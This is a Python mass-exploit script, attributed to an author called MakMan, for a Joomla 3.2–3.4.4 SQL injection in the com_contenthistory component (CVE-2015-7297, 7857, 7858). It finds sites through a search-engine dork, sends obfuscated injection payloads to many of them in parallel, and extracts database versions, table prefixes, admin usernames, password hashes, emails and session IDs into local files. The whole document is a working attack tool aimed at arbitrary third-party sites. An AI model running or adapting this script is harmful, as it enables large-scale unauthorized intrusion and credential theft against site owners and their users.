# Make sure makman.py is in the same directory
# Vulnerability found by : trustwave.com
# Exploit Author : http://mukarramkhalid.com
# https://www.facebook.com/makmaniac
# https://twitter.com/themakmaniac
from makman import *
from urllib.parse import urlparse
from time import time as timer
def banner():
print( '\n\n' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( ' [Mass Exploit] Joomla 3.2 - 3.44 SQL Injection ' )
print( ' Vulnerability found by : trustwave.com ' )
print( ' CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 ' )
print( ' MakMan -- http://mukarramkhalid.com -- http://fb.com/makmaniac ' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( '\n' )
def inject( u ):
tblprefix = ''
username = ''
password = ''
email = ''
session_id = ''
#Payload for version() and user()
payload1 = { 'option' : 'com_contenthistory', 'view' : 'history', 'list[ordering]' : '' , 'item_id' : '', 'type_id' : '', 'list[select]' : 'polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,version(),user())as mk)``)``))' }
#Payload for table prefix
payload2 = { 'option' : 'com_contenthistory', 'view' : 'history', 'list[ordering]' : '' , 'item_id' : '', 'type_id' : '', 'list[select]' : 'polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,(/*!00000select*//*!00000table_name*//*!00000from*//*!00000information_schema*/.tables/*!00000where*/table_schema=database() and/*!00000table_name*/like 0x25636f6e74656e745f7479706573 limit 0,1))as mk)``)``))' }
#Formating our URL properly
o = urlparse(u)
url = o.scheme + '://' + o.netloc + o.path
r = requests.get( url, params = payload1, timeout= 15 )
if 'makman~:' in r.text:
iresult = re.search( "makman~:(.+?)'", r.text ).group(1)
r = requests.get( url, params = payload2, timeout= 15 )
if 'makman~:' in r.text:
tresult = re.search( "makman~:(.+?)'", r.text ).group(1)
tblprefix = tresult.replace('content_types', '')
payload3 = { 'option' : 'com_contenthistory', 'view' : 'history', 'list[ordering]' : '' , 'item_id' : '', 'type_id' : '', 'list[select]' : 'polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e3a,(/*!00000select*/concat_ws(0x7e3a,0x6d616b6d616e,username,password,email) /*!00000from*/' + tblprefix + 'users order by id ASC limit 0,1),(/*!00000select*/session_id /*!00000from*/' + tblprefix + 'session order by time DESC limit 0,1))as mk)``)``))' }
r = requests.get( url, params = payload3, timeout= 15 )
if 'makman~:' in r.text:
fresult = re.search( "makman~:(.+?)'", r.text ).group(1)
username = fresult.split('~:')[0]
password = fresult.split('~:')[1]
email = fresult.split('~:')[2]
session_id = fresult.split('~:')[3]
print ( '------------------------------------------------\n' )
print ( '[+] Url : ' + url )
print ( '[+] User : ' + iresult.split('~:')[1] )
print ( '[+] Version : ' + iresult.split('~:')[0] )
print ( '[+] tbl_prefix : ' + tblprefix )
print ( '[+] Username : ' + username )
print ( '[+] Password : ' + password )
print ( '[+] Email : ' + email )
print ( '[+] Session Id : ' + session_id )
print ( '\n------------------------------------------------\n')
return url + '~:' + iresult + '~:' + tblprefix + '~:' + username + '~:' + password + '~:' + email + '~:' + session_id
return url + '~:' + 'Not Vulnerable'
return url + '~:' + 'Bad Response'
def main():
start = timer()
dork = 'inurl:index.php?option=com_*'
file_string = '######## By MakMan ########\n'
final_result = []
count = 0
print( '[+] Starting dork scanner for : ' + dork)
#Calling dork_scanner from makman.py for 6 pages and 6 parallel processes
search_result = dork_scanner( dork, '6', '6' )
print( '[+] Total URLs found : ' + str( len( search_result ) ) )
with open( 'urls.txt', 'a', encoding = 'utf-8' ) as ufile:
ufile.write( '\n'.join( search_result ) )
print( '[+] URLs written to urls.txt' )
print( '\n[+] Trying Joomla SQL Injection exploit on ' + str( len( search_result ) ) + ' urls' )
#Running 8 parallel processes for the exploitation
with Pool(8) as p:
final_result.extend( p.map( inject, search_result ) )
for i in final_result:
if not 'Not Vulnerable' in i and not 'Bad Response' in i:
count += 1
file_string = file_string + i.split('~:')[0] + '\n' + i.split('~:')[1] + '\n' + i.split('~:')[2] + '\n' + i.split('~:')[3] + '\n' + i.split('~:')[4] + '\n' + i.split('~:')[5] + '\n' + i.split('~:')[6] + '\n\n\n'
#Writing vulnerable URLs in a file makman.txt
with open( 'makman.txt', 'a', encoding = 'utf-8' ) as rfile:
rfile.write( file_string )
print( 'Total URLs Scanned : ' + str( len( search_result ) ) )
print( 'Vulnerable URLs Found : ' + str( count ) )
print( 'Script Execution Time : ' + str ( timer() - start ) + ' seconds' )
if __name__ == '__main__':
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